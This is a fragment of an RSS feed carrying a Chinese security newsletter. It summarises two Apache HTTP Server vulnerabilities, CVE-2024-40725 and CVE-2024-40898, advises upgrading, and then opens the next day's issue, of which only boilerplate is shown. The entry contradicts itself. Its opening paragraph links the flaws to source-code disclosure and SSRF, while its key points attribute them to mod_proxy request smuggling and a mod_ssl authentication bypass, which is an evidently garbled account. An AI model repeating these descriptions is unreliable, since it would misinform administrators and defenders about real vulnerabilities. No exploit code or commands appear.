block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240721</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code>
		</p>
	</blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 Apache HTTP服务器高危漏洞影响版本2.4.0至2.4.61</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">GitHub 上的一个仓库（TAM-K592/CVE-2024-40725-CVE-2024-40898）披露了两个高危漏洞（CVE-2024-40725 和 CVE-2024-40898），这些漏洞影响了 Apache HTTP Server 2.4.0 至 2.4.61 版本，可能导致源代码泄露和服务器端请求伪造（SSRF）攻击。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=e207a900&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZn2p6s1XVfMoaQYTCUPYkXJ2MuCAeQfbKdic0wwpibVtYazBFzeLxBqiaQKC2moy7gWbYzfBhlxdDOkQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Apache HTTP Server 2.4.0 - 2.4.61 版本存在漏洞 CVE-2024-40725 和 CVE-2024-40898</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Apache HTTP Server 2.4.0-2.4.61 版本发现漏洞 CVE-2024-40725 和 CVE-2024-40898</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2p6s1XVfMoaQYTCUPYkXJx71Dj6LHInJy9bDPzsjahoqb84eMHRtJvqAb8vxurV1licOO8JZ23Ew/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZn2p6s1XVfMoaQYTCUPYkXJx71Dj6LHInJy9bDPzsjahoqb84eMHRtJvqAb8vxurV1licOO8JZ23Ew/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522181224422542"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-40725 漏洞的存在是由于 mod_proxy 模块在处理 ProxyPass 指令和 URL 重写规则时的解析不一致，这可能导致 HTTP 请求欺骗攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过发送精心构造的 HTTP 请求来利用这个漏洞，从而在代理服务器和后端服务器之间造成请求解析的不一致，进而实现信息泄露等攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">CVE-2024-40898 漏洞的危险之处在于，它允许攻击者绕过 mod_ssl 模块的客户端认证机制，这可能导致未授权的系统访问。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">对于这两个漏洞，最重要的缓解措施是升级到 Apache HTTP Server 的最新版本，同时对现有的代理和 SSL 配置进行审计和加固，以确保不会因为配置错误而暴露于这些高危漏洞。</section></li></ul>
	<br/>
	<p>🏷️: CVE, SSRF, 漏洞, Apache HTTP服务器, HTTP请求走私</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=991c0b7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZlbmEWU7ZApsl3ia3YLicI4H3nwksKq8ZBqrghjtia9TYiblaxU2VXrUpDcAM57Ric0wX9pBg69IusWVyg%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487637">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5b0c6fdb&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487637%26idx%3D1%26sn%3D6229121098df1fb61d8329fd41691f72%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 21 Jul 2024 09:47:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0720 | Bitlocker、Responder捕获、 自适应DLL劫持等</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487565&amp;idx=1&amp;sn=5dede3202afe5235a887e85139d6a3b8</link>
      <description>「推安早报」2024-07-20</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-20 09:26</span> <span style="display: inline-block;">中国香港</span>
</p>

<p>「推安早报」2024-07-20</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=230cdff2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZn2Du7Y5V92JTr3kZxnw3OoEgmYBUlfGuyodTUkYS2Ve4rI819tTTr8jTsz3bhJdoW85Pqq7kzpjQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;"><h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-20 安全「信息差」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;">
		<span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送「新、热、赞」，降噪增效<br/>
			2. 查漏补缺，你可能错过了一些小东西<br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能大众或小众，不代表本人偏好或认可<br/>
			4. 因渲染和外链原因，公众号<code>甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240720</code>获取完整pdf		</p>
	</blockquote>
